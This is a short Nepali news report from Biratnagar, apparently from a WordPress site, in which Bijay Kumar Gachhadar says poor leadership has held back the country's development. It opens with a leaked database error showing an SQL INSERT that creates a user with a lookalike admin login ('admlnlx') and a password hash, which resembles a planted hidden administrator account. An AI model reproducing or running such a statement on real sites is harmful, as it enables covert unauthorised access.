WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B0HJrM/rqOfgrlRkZ4pAbOAZonRLwZ.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 23:16:08', '', 'admlnlx', 'admlnlx')
विराटनगर, माघ ४ –
मधेसी जनअधिकार फोरम लोकतान्त्रिकका अध्यक्ष विजयकुमार गच्छदारले असल नेतृत्वको अभावमा मुलुकको विकास हुन नसकेको बताएका छन् ।
विराटनगर–१६ स्थित लक्ष्मीनारायण टोलमा आयोजित श्रीमद्भागवत तथा धनधान्याञ्चल ज्ञान महायज्ञको उद्घाटन गर्दै उहाँले मुलुकको जलस्रोत र पर्यटन पूर्वाधारलाई सदुपयोग नगरिएकै कारण देश विकासमा पछाडि परेको बताए ।
यसअघि, सो स्थलबाट कलशयात्रा निकालिएको थियो । यात्रामा सयौँको सहभागिता थियो । रासस